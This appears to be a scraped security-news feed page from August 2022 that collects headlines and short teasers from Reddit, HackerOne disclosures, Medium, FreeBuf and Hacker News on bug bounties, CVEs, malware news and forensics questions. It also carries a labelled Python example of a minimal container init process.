    Question says it all. I'm currently going through my CCNP ENCOR, and covering IPSec in the Overlay Tunnels chapter. IPSec typically has 2 modes: transport and tunnel. Tunnel mode encrypts the ENTIRE packet, but requires dedicated endpoints - something that normies aren't going to have. Transport mode encrypts only the payload (i.e. personal data), but keeps all the original header information (ports and IP addresses). However, HTTPS already encrypts the payload of network traffic. And a huge chunk of traffic hitting the internet (not just web traffic) is HTTP-based. So would that not mean that - from a security perspective - personal (aka Transport) VPNs are basically useless? I understand the benefit of circumventing region locking for purposes of watching normally off-limits content (i.e. Netflix), but my question here is solely based on the security perspective. Many thanks for any input. submitted by /u/lfionxkshine [link] [comments]
  • Open

    Weekly quiz covering 10 interesting infosec stories or events from the past week
    submitted by /u/jaco_za [link] [comments]
    Kanye West's Stem Player - An engineering disaster
    submitted by /u/krystalgamer [link] [comments]
    nday exploit: libinput format string bug, canary leak exploit (cve-2022-1215)
    submitted by /u/Gallus [link] [comments]
  • Open

    RCE vulnerability in Hyperledger Fabric SDK for Java
    Hyperledger disclosed a bug submitted by freskimo: https://hackerone.com/reports/801370 - Bounty: $200
    Enrolling to a CA that returns an empty response crashes the node process
    Hyperledger disclosed a bug submitted by mttrbrts: https://hackerone.com/reports/506412 - Bounty: $500
    Brute Force of fabric-ca server admin account
    Hyperledger disclosed a bug submitted by xiaoc: https://hackerone.com/reports/411364 - Bounty: $1500
    cross site scripting in : mtn.bj
    MTN Group disclosed a bug submitted by alimanshester: https://hackerone.com/reports/1264834
    Ingress-nginx path allows retrieval of ingress-nginx serviceaccount token
    Kubernetes disclosed a bug submitted by gaffy: https://hackerone.com/reports/1382919 - Bounty: $2500
  • Open

    SecWiki News 2022-08-06 Review
    Kaggle knowledge: basics of time-series forecasting by ourren; A brief discussion of trends in validating the effectiveness of security controls by ourren; [HTB] Haircut Writeup by 0x584a. For more of the latest articles, visit SecWiki
  • Open

    What is OSINT
    Suppose we have been trying to find someone online, perhaps by using an email address or a username. This is where OSINT comes in. Continue reading on Medium »
  • Open

    Smart contract security best practices: PART 1
    No content preview
    Post-Exploitation Basics In Active Directory Environment By Hashar Mujahid
    No content preview
    How I was able to get 29 free products. | Bug Bounty
    No content preview
    Another day, Another IDOR vulnerability— $5000 Reddit Bug Bounty
    Gaining unprivileged access to Reddit moderator logs Continue reading on InfoSec Write-ups »
  • Open

    Docker와 Dumb-Init
    Today I want to talk about dumb-init, PID 1, and init systems, which are used to make containers run reliably under Docker. Init and PID 1: On most operating systems, Linux and macOS included, the very first PID is assigned to the init process that runs at startup. So when you check with ps and the like, an init-related process usually holds PID 1. On Unix-based operating systems the init process is the daemon that becomes the first process at boot, and because it is PID 1 it is the direct or indirect parent of every process. That is because adopting orphaned processes is part of init's job. However, Docker's lightweight containers have no init system such as systemd or sysvinit, so the command given in ENTRYPOINT, i.e. the user's own application or shell script, receives PID 1. ENTRYPOINT ["/app/run.sh"] # this is pid 1 Problem: So what goes wrong when an ordinary application holds PID 1? Signal: When an ordinary application or script receives PID 1, since it was never designed to manage processes, it may well fail to handle signals correctly. If /app/run.sh is set as the ENTRYPOINT to launch the app, that shell script takes PID 1 and the application started by the script gets a child PID. .host(node) └── [PID 1] /app/run.sh └── [PID 2] /app/server --bind 8080 In this case the shell script cannot handle the signal, so signals are not processed properly. And the user application, too, unless it sets up its own signal handler as in the example below, will not handle...
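    As an added illustration of the PID 1 problem described above (example code written for this page, not the original post's code and not dumb-init's own source): a minimal init in Python that does the two things a PID 1 has to do, re-send termination signals to its child and reap children as they exit. The function name run_as_init and the sh -c workloads used in the test are the example's own.

```python
import os
import signal
import sys

# Signals a container runtime sends to PID 1 (docker stop -> SIGTERM). A plain
# script or app running as PID 1 with no handler installed would have them
# dropped by the kernel, which ignores default-disposition signals for PID 1.
FORWARDED = (signal.SIGTERM, signal.SIGINT, signal.SIGHUP)


def run_as_init(argv):
    """Run argv as a child the way a tiny init (dumb-init, tini) would.

    - every signal in FORWARDED that reaches us is re-sent to the child,
    - every child that exits is reaped, including orphans adopted while we
      really are PID 1 (outside a container they go to the host's init),
    - the return value follows the shell convention: the child's exit code,
      or 128 + signal number if the child was killed by a signal.
    """
    state = {"child": None}

    def forward(signum, _frame):
        pid = state["child"]
        if pid is None:
            return  # signal arrived before fork finished; nothing to forward to
        try:
            os.kill(pid, signum)
        except ProcessLookupError:
            pass  # child already gone; wait() below reports its status

    # Install handlers *before* forking so a fast child cannot race us.
    previous = {sig: signal.signal(sig, forward) for sig in FORWARDED}
    try:
        pid = os.fork()
        if pid == 0:
            # Child: restore default dispositions, then become the workload.
            for sig in FORWARDED:
                signal.signal(sig, signal.SIG_DFL)
            try:
                os.execvp(argv[0], argv)
            except OSError:
                os._exit(127)  # command not found / not executable
        state["child"] = pid

        status = None
        while True:
            try:
                done, wstatus = os.wait()  # reaps whichever child exited, orphans too
            except ChildProcessError:
                break  # no children left at all
            if done == pid:
                status = wstatus  # main workload finished: the init's job is done
                break
    finally:
        for sig, handler in previous.items():
            if handler is not None:
                signal.signal(sig, handler)

    if status is None:
        return 1
    if os.WIFSIGNALED(status):
        return 128 + os.WTERMSIG(status)
    return os.WEXITSTATUS(status)


if __name__ == "__main__":
    # ENTRYPOINT ["python3", "/init.py", "/app/server", "--bind", "8080"]
    if len(sys.argv) < 2:
        sys.exit("usage: init.py <command> [args...]")
    sys.exit(run_as_init(sys.argv[1:]))
```

    With this in front of the real workload, docker stop delivers SIGTERM to PID 1 (the init), which re-sends it to the server instead of letting the kernel drop it, and when the server exits the init exits with the same status so the container stops cleanly. dumb-init and tini do the same with more options (process-group forwarding, signal rewriting) and without a Python runtime in the image.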
  • Open

    Drop your favorite resource for exploit dev
    I want to start learning exploit dev, if you guys can help me with it or drop in your favorite resource that helped you get where you are, it would be great! If someone has time and would like to answer a few questions, it would help me a lot too. submitted by /u/National_Concern2361 [link] [comments]
  • Open

    Pocsuite3: An open-sourced remote vulnerability testing framework
    Article URL: https://github.com/knownsec/pocsuite3 Comments URL: https://news.ycombinator.com/item?id=32365622 Points: 1 # Comments: 0
  • Open

    A roundup of 30+ common unauthorized-access vulnerabilities
    Covers the 30+ common unauthorized-access vulnerabilities currently published in online sources
  • Open

    game images
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    The Mysterious Container net.core.somaxconn (2022)
    TL;DR: Try to answer several quick questions with a long post. On creating a pod in Kubernetes, if somaxconn is not specified, what will the default value be, and who sets it? If you change a node's sysctl settings, will they be propagated to pods? Are all sysctl parameters equal in terms of initialization and propagation? Contents: TL;DR; 1 Background; 1.1 Journey of components when creating a pod; 1.2 sysctls in container and unsafe sysctls in k8s; 1.3 The net.core.somaxconn parameter of pods/containers; 1.4 Problem statement; 2 Dig inside; 2.1 kube-apiserver -> kubelet; 2.2 kubelet -> dockerd; 2.3 Skip k8s/kubelet/cni: create container right from docker; 2.4 Skip docker: create container right from containerd; Find the right containerd.sock file; Pull image; Create a container; Check the …

  • Open

    Process Injection
    Whenever we get a reverse shell, it is mostly spawned as a new, separate process; if that process gets killed, it could be… Continue reading on Medium »
  • Open

    Automate SQLiDetector Hacking Tool
    A fully automated SQL injection detection hacking tool Continue reading on Medium »
    Hacking a company from a phone
    This story is a tale from my job around being able to fully compromise a server whilst only having my phone accessible to me. Continue reading on Medium »
    Irremovable guest in facebook event — Facebook bug bounty
    Hello Everyone, This is Rajiv Gyawali from Butwal, Nepal. This is a story of one of my finding on facebook. Continue reading on Medium »
    Orderby Limit Sql
    Introduction to SQL LIMIT and ORDER BY. The LIMIT clause in MySQL is used to restrict the number of rows retrieved in the result set of the… Continue reading on Medium »
    Web Security Academy — OS command injection, simple case
    This challenge is from the Web Security Academy by Portswigger. It is under the category “OS command injection”. After starting the lab… Continue reading on Medium »
    Bypassing Blacklists CTF In Kali Linux
    Continue reading on Medium »
    Automated Tools Sql NINJA
    sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking… Continue reading on Medium »
    Error Based Sql Injection
    What Is Error-Based SQL Injection? Continue reading on Medium »
    Double Blind Sql Injection
    SQL Injection vulnerabilities are often detected by analyzing error messages received from the database, but sometimes we cannot exploit… Continue reading on Medium »
    How Blind SQL Injection Works
    Blind SQL injection is a type of SQL injection attack where the attacker indirectly discovers information by analyzing server reactions to… Continue reading on Medium »
  • Open

    Fix : (Security) Mitigate Path Traversal Bug
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1635321 - Bounty: $200
  • Open

    Chrome 105 Beta: Custom Highlighting, Fetch Upload Streaming, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 105 is beta as of DATE. You can download the latest on Google.com for desktop or on Google Play Store on Android. Custom Highlight API The Custom Highlight API extends the concept of highlighting pseudo-elements by providing a way to style the text of arbitrary ranges, rather than being limited to the user agent-defined ::selection, ::inactive-selection, ::spelling-error, and ::grammar-error. This is useful in a variety of scenarios, including editing frameworks that wish to implement their own selection, find-in-page over virtuali…
  • Open

    How Passwordless Works
    Passwordless is a form of authentication that doesn't require users to provide passwords during login. That much you could glimpse from the name, but how does it work? What are its trade-offs? This blog post will do its best to explain to you how passwordless can be implemented using modern technologies such as Web Authentication (WebAuthn), while at the same time providing better user experience and security than the traditional password-based approach. submitted by /u/Blakebvhjjdd [link] [comments]
    Repository of Adversarial Tactics That is Updated Daily
    submitted by /u/entropydaemon8 [link] [comments]
    New Era of Phishing Payloads After The Deprecation of Macros
    submitted by /u/sciencestudent99 [link] [comments]
    Reverse Engineering Windows Printer Drivers (Part 1)
    submitted by /u/sanitybit [link] [comments]
    Exploiting a Linux kernel Use-After-Free in io_uring
    submitted by /u/awarau888 [link] [comments]
    A journey into IoT - Unknown Chinese alarm - Part 3 - Radio communications
    submitted by /u/0xdea [link] [comments]
    Abusing container mount points and symlinks on MikroTik's RouterOS to gain code execution
    submitted by /u/crower [link] [comments]
    fwd:cloudsec 2022 Conference Talk Recordings
    submitted by /u/sanitybit [link] [comments]
  • Open

    Why do you do Exploit Dev?
    Before I start this I want to preface that I am genuinely curious and not trying to start an argument over programming languages and whatnot, but why do you all want to do exploit development? As far as I understand it (which is possibly incorrect), developing exploits is starting to become a thing of the past with much more "safe" languages and mitigations being implemented and software becoming much more safe. Now this may be a scathing hot take, but is there a bit of truth to it? I like the idea of Exploit Dev and I would love to know your opinions/why you do what you do. I want to get into Exploit Dev, but I don't think as a career, rather as a cool hobby that would be cool to talk about. Thanks for reading submitted by /u/Synosis1 [link] [comments]
  • Open

    CVE-2022-29582 – An io_uring vulnerability
    Article URL: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/ Comments URL: https://news.ycombinator.com/item?id=32359814 Points: 4 # Comments: 0
    CVE-2022-29154 – rsync exploit
    Article URL: https://docs.ssh-mitm.at/CVE-2022-29154.html Comments URL: https://news.ycombinator.com/item?id=32353570 Points: 2 # Comments: 0
  • Open

    High-impact vulnerability in DrayTek routers leaves thousands of SMEs open to
    Article URL: https://portswigger.net/daily-swig/high-impact-vulnerability-in-draytek-routers-leaves-thousands-of-smes-open-to-exploitation Comments URL: https://news.ycombinator.com/item?id=32356636 Points: 1 # Comments: 0
    Slack Serious Vulnerability: Invite Link Function
    Just received this in my inbox: We are writing to let you know about a bug we recently discovered and fixed in Slack's Shared Invite Link functionality. This feature allows you to create a link that will permit anyone to join your Slack workspace; it is an alternative to inviting people one-by-one via email to become workspace members. You are receiving this email because you created and/or revoked one of these links for your workspace between April 17, 2017 and July 17, 2022. We'll go into detail about this security issue below. Important things first, though: We have no reason to believe that anyone was able to obtain your plaintext password because of this vulnerability. However, for the sake of caution, we have reset your Slack password. You will need to set a new Slack password before…
  • Open

    War in Ukraine / August 4
    Day 163: The Kharkiv direction is another difficult point for the Russian Federation Continue reading on Medium »
    An Interview with a Private Investigator and OSINT master
    Chatting with OhShINT Continue reading on Medium »
  • Open

    SecWiki News 2022-08-05 Review
    Some rambling thoughts in the fourth year of attack-defense exercises by ourren; Full walkthrough of MSF multi-layer internal network penetration by ourren; Data transmission security white paper by ourren; Development and adjustment of the US critical infrastructure cyber defense roadmap by ourren. For more of the latest articles, visit SecWiki
  • Open

    How do you analyze a possible "drive by" download incident?
    Or is it something else entirely? [Paraphrasing here] I received a panicked call from a friend the other day. Intending to go to fivethirtyeight.com, she'd instead typed in .org. This took her to a page (safety-search dot com) that was prompting her to download their "yahoo team developed" browser plugin to help her with safe searches. She didn't click on anything and, when she got back to her screen with phone in hand, her browser had gone to fivethirtyeight.com. There were no malware protection software notifications of any kind anywhere in the process. Did something already happen by then, even if she didn't click on anything? What's the best way to look at this type of incident to figure out what might or might not have happened? submitted by /u/arnach [link] [comments]
  • Open

    How to analyze Linux malware – A case study of Symbiote
    https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/ submitted by /u/CyberMasterV [link] [comments]
    Linux Forensics Scenario
    Good morning /r/computerforensics. I've got a hypothetical scenario I'd like to run by you - I've got an Ubuntu VM. Suppose I create a partition, write files to that partition, and then delete the partition. How would I image the VM to obtain the disk slack that contained that partition? Do VMs even contain disk slack? How about if I have partitions sda, sdb, and sdc, aside from the naming convention, if I deleted sdb, any tips on identifying that there was once an sdb (using a tool like sleuthkit)? Thank you for your time and mental cycles :) submitted by /u/DeadBirdRugby [link] [comments]
    Remote Forensic Imaging
    Hello everyone! I have to create a forensic image of a dedicated server hosted on OVH. Any suggestions? submitted by /u/Zipper_Ita [link] [comments]
  • Open

    Analysis of APT32 attack activity against China's critical infrastructure organizations
    APT32 (OceanLotus) is a top-tier hacking group with state backing.
    FreeBuf Morning Report | Alibaba says internet companies are slowing cloud spending; Woody remote access trojan targets Russian entities
    On Alibaba's Q2 2022 earnings call, executives spoke of an "internet industry slowdown" that is hampering Alibaba Cloud's growth.
    Beware of the harm ransomware poses to industrial control networks
    Ransomware is a newer type of computer virus that spreads mainly via email, trojanized programs, and malicious code planted on web pages. It is vicious and extremely harmful; once infected, users suffer incalculable losses.
    Key points of Cambodia's data compliance rules explained
    In recent years Cambodia has placed great emphasis on developing its digital economy, enacting an E-Commerce Law and bringing foreign e-commerce companies into a simplified VAT registration mechanism.
    New Linux botnet RapperBot brute-forces SSH servers
    Researchers have discovered a new Internet of Things (IoT) botnet, "RapperBot", which has been active since mid-June 2022.
    FreeBuf Weekly | Australian privacy regulator investigates TikTok; India withdraws its data protection bill; blockchain industry hit hard by supply chain attack
    Australia's privacy regulator is investigating TikTok; TikTok says the report contains multiple errors and "a fundamental misunderstanding of mobile apps".
    [In depth] Source code analysis of OpenSea's new Seaport protocol
    NFT marketplace OpenSea recently announced Seaport, a new Web3 marketplace protocol for buying and selling NFTs securely and efficiently. This article analyzes in depth how its key business logic and interfaces are implemented.
    Notes on a penetration test of an illegal website
    The original version of this article is on my personal WeChat official account (ZAC安全); some controversial content has been revised.
    Indian government announces withdrawal of the country's data protection bill
    On August 3, India's Minister of State for Electronics and Information Technology, Rajeev Chandrasekhar, announced that the Data Protection Bill introduced in 2019 has been formally withdrawn.
    Cyberattacks on the gaming industry surged 167% over the past year
    Cybersecurity company Akamai has released its latest report.
    DrayTek RCE vulnerability disclosed, affecting 29 of its router models
    Researchers discovered a critical remote code execution vulnerability that seriously affects 29 models of DrayTek Vigor business routers.
    German Chambers of Industry and Commerce (DIHK) knocked out by cyberattack
    An attack group set its sights on DIHK and launched a large-scale cyberattack. Unable to withstand an attack of that force, DIHK simply gave up.
    Solana loses $5 million to theft; specific cause still unclear
    Attackers stole more than $5 million from the Solana blockchain platform; the specific cause of the theft is still under investigation.
  • Open

    Let’s Learn API Security: More about Broken Object Level Authorization
    Introduction Continue reading on InfoSec Write-ups »
    What do we learn from modern Cyber Warfare & State Sponsored Threats (SCADA & ICS)
    No content preview
    HTB — Dirty Money — Debugger Unchained Write Up
    No content preview
    Malware Traffic Analysis Exercise | Burnincandle | IcedID Malware
    No content preview
  • Open

    Elastic Open Sources Their Endpoint Security Protection YARA Ruleset
    submitted by /u/sanitybit [link] [comments]
    Azure Threat Research Matrix
    submitted by /u/sanitybit [link] [comments]
    HyperDbg: Reinventing Hardware-Assisted Debugging
    submitted by /u/sanitybit [link] [comments]
    Sharpening Your Tools: Updating bulk_extractor for the 2020s
    submitted by /u/sanitybit [link] [comments]
    Cloudflare Implements Experimental Support for Post-Quantum Cryptography
    submitted by /u/sanitybit [link] [comments]
    Exploring the SameSite cookie attribute for preventing CSRF!
    submitted by /u/macropng [link] [comments]
    How To Implement JSON Web Token (JWT) in Java Spring Boot
    submitted by /u/sanitybit [link] [comments]
    Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and more!
    submitted by /u/ly4k_ [link] [comments]
    QNAP Poisoned XML Command Injection (Silently Patched)
    submitted by /u/chicksdigthelongrun [link] [comments]
    Tool that automates the tedious process of searching leaks through format string vulnerabilities. It will allow you to find stack leaks, pie leaks and canary leaks, in each case indicating the payload that provides the leak.
    submitted by /u/Diego-AltF4 [link] [comments]
    Building did someone clone me: a free service that notifies its users when their website is cloned and used in a phishing attack
    submitted by /u/wez32 [link] [comments]
    Risky Business: Determining Malicious Probabilities Through ASNs
    submitted by /u/sanitybit [link] [comments]
    PersistenceSniper: Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines by @last0x00
    submitted by /u/last0x00 [link] [comments]
    Paranoid project checks for well known weaknesses on cryptographic artifacts such as public keys, digital signatures and general pseudorandom numbers
    submitted by /u/Gallus [link] [comments]
  • Open

    Server Side Template Injection-Something Distinct!
    How’s it going guys! My name is Sagar Sajeev and this is my writeup about one of my recent SSTI (Server Side Template Injection) findings. Continue reading on Medium »
    Finding internal ip for big organization
    I have found a way to find the internal IP of a big organization (for example Twitter, LinkedIn, etc.). The way to do that is very simple. Continue reading on Medium »
    The Instacart Bug Bounty Program - How We Work with White Hat Hackers to Secure Instacart
    Authors: James Cha, Vickie Li, Shashank Mirji, and Frank Filho Continue reading on tech-at-instacart »
    Authentication Bypass
    When performing a penetration test of an application, tests against the authentication mechanism are always an important check. While a… Continue reading on Medium »
    DBMS Detection Of Sql Injection
    In this article, we will learn about DBMS Injection. Continue reading on Medium »
    Protection Strategies Sql Injection
    SQL injections are one of the most utilized web attack vectors used with the goal of retrieving sensitive data from organizations. Continue reading on Medium »
    Finding SQL Injection Manually
    SQL injection is a code injection technique used to hack websites, attack data applications, destroy databases by inserting malicious SQL… Continue reading on Medium »
    SS7 Practical Video From Pentester Club
    Signaling System 7 (SS7) is an architecture for performing out-of-band signaling in support of the call-establishment, billing, routing… Continue reading on Medium »
    what is footprinting in hacking || types of footprinting || Pentester Club
    Footprinting is an ethical hacking technique used to gather as much data as possible about a specific targeted computer system, an… Continue reading on Medium »
  • Open

    “Liberators” vs “Occupiers”: the importance of subtle propaganda
    I defend Lakoff’s idea that propaganda is about how one frames an issue by looking at media coverage of the Russian invasion of Ukraine. Continue reading on Medium »
    How To Track An Individual On Social Media Using OSINT — Part 3.2
    Hello Folks! I hope you liked my OSINT series. In this blog, we will discuss some professional and undercover techniques to track anyone… Continue reading on Medium »
    War in Ukraine / August 3
    Day 162: Mykolaiv will not be forcibly evacuated Continue reading on Medium »
    Orwell is here now. He’s livin’ large.
    Well.. let's start this story back at the beginning! I am not a hacker but Angelina Jolie circa ’95 was my first love and I have seen the… Continue reading on Medium »
  • Open

    Getting access of mod logs from any public or restricted subreddit with IDOR vulnerability
    Reddit disclosed a bug submitted by high_ping_ninja: https://hackerone.com/reports/1658418 - Bounty: $5000
    Unauthenticated Private Messages Disclosure via WordPress REST API
    Automattic disclosed a bug submitted by ghimire_veshraj: https://hackerone.com/reports/1590237 - Bounty: $350
    Sensei LMS IDOR to send message
    Automattic disclosed a bug submitted by ghimire_veshraj: https://hackerone.com/reports/1592596 - Bounty: $100
    Unrestricted File Upload Blind Stored XSS in subdomain ads.tiktok.com
    TikTok disclosed a bug submitted by mrzheev: https://hackerone.com/reports/1577370 - Bounty: $250
  • Open

    Is there any getting around Deep Freeze?
    Has anyone encountered Deep Freeze, and know if there's a way around its "reboot to restore" ability? submitted by /u/greyyit [link] [comments]
  • Open

    Analyzing a Remcos RAT Infection
    No content preview
    A Multi-Layered Security Architecture for Databases
    No content preview
    Intro to Digital Forensics
    No content preview
    This is how he could hijack Reddit accounts with just ONE click: a $10,000 bug bounty
    Exploring Frans Rosén’s bypass of OAuth security Continue reading on InfoSec Write-ups »
  • Open

    Why is there such a big difference in company response time to vulnerabilities?
    I know that each company has different procedures and practices, but as a student of cybersecurity, I'm struggling to understand why some large companies struggle to patch vulnerabilities while others can with ease. To illustrate this example, we'll look at CVE-2022-0778 (publicized March 15th, 2022). An OpenSSL vulnerability that was a bug in the BN_mod_sqrt() function: if served a maliciously crafted cert to parse, it would enter an infinite loop. The vulnerability then impacts a bunch of different scenarios such as Denial of Service, TLS servers consuming client certs, TLS servers consuming client certs, taking private keys from customers, etc. Looking through the vulnerability reports and responses, I saw that each cybersec company responded to the vulnerability differently. Some were able to patch it fast, while others still haven't come up with a fix. For instance, PAN deployed a patch 39 days after the publication, Check Point deployed one in 2-3 days, but companies like Fortinet + Cisco still haven't announced a patch yet. My main question is if it's considered "High Severity", then why would some companies still not have it patched? Thanks. submitted by /u/Beginning_Actuary_54 [link] [comments]
    Missing Firmware Files
    I am attempting to install AlienVault OSSIM on a new server but I can not get past this error. I can not find this bin file online. Would anyone be able to link me to a place that I can download this firmware file? submitted by /u/SOSicearrow [link] [comments]
    Drive-By-Downloads: How does malware "leave" the browser to attack the OS, software, etc?
    How is malware that was delivered to you via the browser able to exploit things like the OS or other software on the computer? In other words, how does malware "travel" outside of the browser to exploit other things on the computer? submitted by /u/Jaruki_Jurakami [link] [comments]
  • Open

    SecWiki News 2022-08-04 Review
    No news updates today. For more of the latest articles, visit SecWiki
  • Open

    HackTheBox — Explosion
    Explosion is a boot2root machine on HackTheBox. It has “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »
    OXDR-Red Team
    The Litmus Test of your Cybersecurity also helps to achieve a continuous Cybersecurity posture.  Redops and Cart  Vulnerability Management… Continue reading on Medium »
  • Open

    A deep dive into Java deserialization: how JNDI works
    An in-depth study of the principles of JNDI injection vulnerabilities and the logic behind them.
    Blockchain industry hit by supply chain attack: tens of thousands of crypto wallets drained, losses of over a hundred million dollars
    According to tech outlet TechCrunch, several unknown attackers drained tens of thousands of crypto wallets holding tokens worth over a hundred million dollars.
    FreeBuf Morning Report | Australian regulator investigates TikTok; GitLab deletes dormant projects in free accounts
    Australia's privacy regulator has stated that, in line with its regulatory action policy, it is reviewing the TikTok data privacy issues identified in a report.
    FreeBuf Morning Report | Australian privacy regulator investigates TikTok; GitLab plans to delete dormant projects in free accounts
    Australia's privacy regulator has stated that, in line with its regulatory action policy, it is reviewing the TikTok data privacy issues identified in a report.
    Analysis of CVE-2022-26138, a hard-coded credential vulnerability in Confluence Server
    Atlassian released its July security updates covering multiple Confluence Server vulnerabilities, among them CVE-2022-26138, a hard-coded credential vulnerability.
    35,000 GitHub repositories hacked? A rumor: they were only maliciously cloned
    Although "35,000 GitHub repositories attacked" turned out to be a false alarm, a software engineer did find that roughly several thousand GitHub repositories were being maliciously cloned.
    Atomic Wallet impersonated: fake website spreads malware
    Atomic Wallet, a well-known decentralized wallet and cryptocurrency exchange portal, was recently impersonated.
    Large-scale phishing campaign targets Microsoft enterprise email services
    Security researchers at ThreatLabz discovered a batch of large-scale phishing campaigns.
    Cisco fixes critical remote code execution vulnerabilities in VPN routers
    Cisco has now released software updates to address the two vulnerabilities.
    Microsoft launches new services expanding enterprise access to its threat intelligence
    This week Microsoft launched two new services that give enterprise security operations centers (SOCs) broader access to the large volume of threat intelligence it collects every day.
    Engineering recruitment in practice: hiring a 20-person Linux and C team in 2 months
    At the start of one year we urgently needed to expand our backend Linux C/C++ development team, hiring 20 people within 2 months. How do you ensure quality when the salaries on offer are not top-tier?
  • Open

    Comics, underground, European and mainstream
    https://booksdl.org/comics0/ submitted by /u/Forward_Hold5696 [link] [comments]
  • Open

    Living off Windows Defender | LockBit ransomware sideloads Cobalt Strike through Microsoft's security tool
    Authors: Julio Dantas, James Haughom, Julien Reisdorffer. Translators: Knownsec 404 Lab translation team. Original link: https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-s...
  • Open

    Need Help. Question about IP/Location
    I am not sure if this is the correct sub; if not, maybe someone can help direct me to the correct one. Basically some of my personal information was stolen and posted online. I used a fake tracking link to capture the IP and other user information of the person that was posting my information online. My main question is, is there any way that the IP could track back to a different state than where the person is actually located? Like if they bought their phone in one state and then moved, could it possibly still show the old state? submitted by /u/HumanUnidentified [link] [comments]

  • Open

    geopipe: filter by server location inside your pipe chain
    submitted by /u/lukahacksstuff [link] [comments]
    The Consequences of Inadequate Identity Management in your GitHub Organization
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]
    Hijacking email with Cloudflare Email Routing
    submitted by /u/jwizq [link] [comments]
    How to detect Brute Ratel C2 (beacons & server deployments)
    submitted by /u/gid0rah [link] [comments]
    EMBA Firmware analyzer version 1.1.0 aka Las Vegas Edt. is out now - a lot of new features including system emulation environment, status bar and Ubuntu support
    submitted by /u/_m-1-k-3_ [link] [comments]
  • Open

    Programming language(s) question
    Hi all, As you guys know I am going into digital forensics (specifically eDiscovery). My question for the day is, what programming language(s) do you guys suggest that I learn? Thank You. submitted by /u/swatteam23 [link] [comments]
    TCU Live: 2022AUG01 (latest release)
    The latest version of "TCU Live" (2022AUG01) has been released. It's running the latest Debian sid packages, Linux 5.18 kernel, and third party packages such as the Tor Browser, checkra1n, volatility, guestmount, git, etc. See the README in the link for more information: https://drive.google.com/drive/folders/0B8zx3qPcj9rJVjJrcnB4aXl1VG8?resourcekey=0-gjI_o4MHtiCvsjet9TCygw&usp=sharing It's built to be fairly lean and extensible and is great for in-house forensics, OSINT, field work, or if you just need to quickly spin up a Linux box. If you are looking for something that'll boot on almost all x86-64 (AMD64) hardware give it a shot and DM me if you have any comments or issues. submitted by /u/atdt0 [link] [comments]
  • Open

    ISP Stale Record Assignments
    A very large ISP had previously associated a number of their IP addresses to our company. What I mean by this is that a WHOIS/ARIN lookup for the IP has our company name referenced in it. These IP addresses are no longer in use by our company as confirmed by the ISP. The ISP is blaming DNS and telling us that it could take years for our company name to be disassociated with the IP. Why do I care? The IP addresses are negatively impacting our public footprint score utilized by regulatory agencies. Who can disassociate our company name from these IP addresses? Can't the owner of the IPs make this change since they own the IP addresses? What do I need to tell them to do? submitted by /u/mtx4gk [link] [comments]
    AlienVault Alarms - Rundll32
    Hi, I need some assistance with AlienVault OTX alarms that I've received recently. Commands are being run on users' machines with their usernames (wouldn't this be "run" as something else if it was an automated process?). They all have to do with: C:\Windows\System32\rundll32.exe and C:\Windows\System32\svchost.exe. I will comment and condense the alarms down. The users whose machines it is occurring on are not computer fluent people and don't know what a command line is. I also can't find any info for the switches of the command line ( -k, -s ). I'm having trouble figuring out if these are false positives. NOTE: MD5 hashes confirm as Microsoft on VirusTotal submitted by /u/compguyguy [link] [comments]
    Bug bounty programs for Linux Kernel bugs and exploits
    Just curious what are the places willing to pay for Linux Kernel bugs and LPE exploits outside Google's kctf, ZDI's pwn2own, and zerodium? submitted by /u/AggravatingTell547 [link] [comments]
    How to exclude specific IP addresses from being monitored on Security Onion?
    Hello, In the global pillar on my manager node (/opt/so/saltstack/local/pillar/global.sls), I already specified my BPF to exclude the monitoring of whitelisted IP addresses as follows: nids: bpf: - not host 192.168.1.2 && - not host 192.168.1.3 && - not host 192.168.1.4 However, the alerts still triggered from the above IP addresses. I think that the AND operators should be replaced by OR? Any advice would be highly appreciated. Thank you. submitted by /u/sanba06c [link] [comments]
  • Open

    Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware
    We provide a case study of how the criminal group Projector Libra uses legitimate file sharing services to distribute Bumblebee malware. The post Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware appeared first on Unit 42.
  • Open

    War in Ukraine / August 2
    Day 161: HIMARS in action — the Russian Federation failed to destroy any of the systems delivered to Ukraine Continue reading on Medium »
  • Open

    [Bugbounty]Blind XSS via header injection to log poisoning
    Hello, I hope you are well and hunting! Continue reading on Medium »
    Subdomain Takeover Tool
    dnsReaper — subdomain takeover tool for attackers, bug bounty hunters and the blue team! Continue reading on Medium »
    You need these certifications *RIGHT NOW*
    Hello guys, I’m Abhishek, today I'm with a new topic. Yes, you heard it right that You need these certifications in 2022 right now. Every… Continue reading on Medium »
    Wanna start your Journey in Web3 Cybersecurity or Bug Bounties?
    Here’s the list of Websites to look upon. Continue reading on Medium »
    How to get started into Bug Bounty?
    COMPLETE BEGINNER’S GUIDE IN 7 STEPS… Continue reading on Medium »
    Elasticsearch A Easy Win For Bug Bounty Hunters || How To Find and Report
    Assalamu Alaikum peace be upon you Continue reading on Medium »
    5 must-have books for bug hunters (Part 1)
    Hello guys, I’m back with another exciting topic. We all need guidance in bug hunting, through our mentors, professional bug hunters, and… Continue reading on Medium »
    When an IDOR becomes EVIL > Total Data Leak​
    Hi fellow hackers and friends, This is Aravind here with another awesome article on how an IDOR bug helped me to access all user data of a… Continue reading on Medium »
    Rate Limiting Bypass
    Hello folks, Continue reading on Medium »
    Open Redirect and information gathering before find that vulnerability
    In this tutorial, I just want to talk about the open redirect vulnerability and explain how hackers do information gathering to find that… Continue reading on Medium »
  • Open

    Attacktive Directory
    ACTIVE DIRECTORY ROOM FROM TRY HACK ME Continue reading on System Weakness »
    Attacktive Directory
